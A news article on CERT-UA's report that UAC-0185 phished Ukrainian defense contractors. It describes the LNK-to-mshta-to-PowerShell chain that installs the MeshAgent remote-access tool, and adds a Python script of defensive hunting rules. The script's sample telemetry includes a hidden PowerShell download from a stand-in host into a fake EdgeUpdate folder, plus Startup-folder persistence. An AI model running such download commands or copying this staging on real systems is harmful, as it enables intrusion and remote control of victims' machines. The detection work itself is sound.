Hackers linked to the Russian state allegedly attack Ukrainian defense contractors
Ukraine has said threat actors linked to the Russian state have been targeting its defense contractors.
The Ukrainian Computer Emergency Response Team (CERT-UA) published a report saying that a group called UAC-0185 had been sending emails containing malicious links to employees of Ukrainian defense contractors and defense forces.
According to CERT-UA, the group posed as the Ukrainian Union of Industrialists and Entrepreneurs (USPP), inviting staff to a real conference on the transition of Ukrainian defense products to NATO standards that was held on 5 November.
The emails contained a link that purportedly led to details of the invitation but instead downloaded a file named “list_02-1-437.lnk.”
“Opening the LNK file will download and run the ‘start.hta’ file using the standard mshta.exe utility,” CERT-UA said.
“The mentioned HTA file contains JavaScript code designed to execute two PowerShell commands, one of which will download and open a bait file in the form of a USPP letter, and the second of which will download the ‘Front.png’ file, which is a ZIP file containing three files: ‘Main.bat’, ‘Registry.hta’ and ‘update.exe’, extract the contents of the file to the directory ‘%LOCALAPPDATA%\Microsoft\EdgeUpdate\Update\’ and start the BAT file ‘Main.bat’.
“The latter will move the ‘Registry.hta’ file to the autorun directory, run it and delete some of the downloaded files from the computer.
“Finally, ‘Registry.hta’ will start ‘update.exe’, which is classified as a MESHAGENT remote control program.”
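The chain CERT-UA describes above (LNK, then mshta.exe running start.hta, then PowerShell fetching a ZIP disguised as Front.png, then Main.bat staging Registry.hta in the Startup folder and finally update.exe) maps onto a handful of endpoint hunting rules. The Python below is an added example written for this page, not code from CERT-UA or the article: the event field names, the sample events, the user profile paths and the example.invalid host are constructed for illustration, and the rules key on the file names, paths and parent/child process relationships the report gives rather than on any hash.

```python
import io
import re
import zipfile
from collections import Counter

# Constructed sample telemetry (not real logs). Fields loosely follow Sysmon
# Event ID 1 (ProcessCreate) and Event ID 11 (FileCreate); the user name "u"
# and the example.invalid host are assumptions made for this example.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" C:\Users\u\AppData\Local\Temp\start.hta'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"powershell -w hidden -c iwr http://example.invalid/Front.png "
                r"-OutFile $env:LOCALAPPDATA\Microsoft\EdgeUpdate\Update\Front.png"},
    {"type": "file", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\u\AppData\Local\Microsoft\EdgeUpdate\Update\Front.png"},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'cmd /c "C:\Users\u\AppData\Local\Microsoft\EdgeUpdate\Update\Main.bat"'},
    {"type": "file", "image": r"C:\Windows\System32\cmd.exe",
     "target": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Registry.hta"},
    {"type": "process", "image": r"C:\Users\u\AppData\Local\Microsoft\EdgeUpdate\Update\update.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"C:\Users\u\AppData\Local\Microsoft\EdgeUpdate\Update\update.exe"},
    # Benign noise: the real Edge updater lives under Program Files, not LOCALAPPDATA.
    {"type": "process", "image": r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r'"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc'},
]

# Staging directory from the report, whether written out or referenced via $env:LOCALAPPDATA.
STAGING_DIR = re.compile(r"(?:appdata\\local|localappdata)\\microsoft\\edgeupdate\\update\\", re.I)
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)


def _base(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def match_rules(event: dict) -> list:
    """Return the names of every hunting rule the event satisfies."""
    hits = []
    if event["type"] == "process":
        img, parent, cmd = _base(event["image"]), _base(event["parent"]), event["cmdline"].lower()
        # LNK -> mshta.exe running an .hta from a user-writable profile location
        if img == "mshta.exe" and ".hta" in cmd and "\\appdata\\" in cmd:
            hits.append("mshta_hta_from_user_profile")
        # the HTA's JavaScript spawning PowerShell
        if img == "powershell.exe" and parent == "mshta.exe":
            hits.append("mshta_spawns_powershell")
        # anything executed from, or referring to, the fake EdgeUpdate staging directory
        if STAGING_DIR.search(event["image"]) or STAGING_DIR.search(event["cmdline"]):
            hits.append("exec_from_localappdata_edgeupdate")
    elif event["type"] == "file":
        target = event["target"]
        if STAGING_DIR.search(target):
            hits.append("file_write_localappdata_edgeupdate")
        # Main.bat moving Registry.hta into the per-user autorun (Startup) folder
        if STARTUP_DIR.search(target) and _base(target).endswith(".hta"):
            hits.append("hta_dropped_in_startup")
    return hits


def hunt(events) -> dict:
    """Count rule hits across an event stream."""
    counts = Counter()
    for ev in events:
        counts.update(match_rules(ev))
    return dict(counts)


def chain_detected(counts: dict, min_distinct_rules: int = 3) -> bool:
    """Several distinct stages firing on one host is treated as the full chain."""
    return len(counts) >= min_distinct_rules


# Front.png is a ZIP in disguise: trust the magic bytes, not the extension.
ZIP_MAGIC = b"PK\x03\x04"


def is_zip_masquerading_as_image(name: str, data: bytes) -> bool:
    looks_like_image = name.lower().endswith((".png", ".jpg", ".jpeg", ".gif"))
    return looks_like_image and data.startswith(ZIP_MAGIC)


def zip_entry_names(data: bytes) -> list:
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def build_fake_png() -> bytes:
    """Constructed stand-in for Front.png: a ZIP carrying the three names the report lists."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in ("Main.bat", "Registry.hta", "update.exe"):
            zf.writestr(name, "placeholder content for the example\n")
    return buf.getvalue()


if __name__ == "__main__":
    counts = hunt(SAMPLE_EVENTS)
    print(counts, "chain detected:", chain_detected(counts))
    sample = build_fake_png()
    print("Front.png is a ZIP:", is_zip_masquerading_as_image("Front.png", sample), zip_entry_names(sample))
```

The rules deliberately key on behaviour (mshta.exe spawning PowerShell, execution from a per-user directory that imitates a vendor path, an .hta landing in the Startup folder) rather than on the specific file names alone, so a renamed Front.png or Main.bat still trips them; the staging-directory regex also accepts the `$env:LOCALAPPDATA` form because that is how the path tends to appear in a PowerShell command line rather than fully expanded.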
The malware delivered through these files has reportedly been used in cyberattacks since early 2023.
While Ukraine did not name Russia as being behind the attacks, SentinelOne linked UAC-0185, also tracked as UNC4221, to the Russian government earlier this year.
The group has been active since at least 2022, according to CERT-UA, and focuses on stealing credentials from Signal, Telegram, WhatsApp, and various military systems such as DELTA, TENETA, and Kropyva.
“At the same time, to a more limited extent, cyber attacks are being carried out aimed at obtaining unauthorized remote access to the computers of employees of the enterprises of the defense industrial complex, as well as the Ukrainian Defense Forces, using specialized hacking software, in particular MESHAGENT and ULTRAVNC,” said CERT-UA.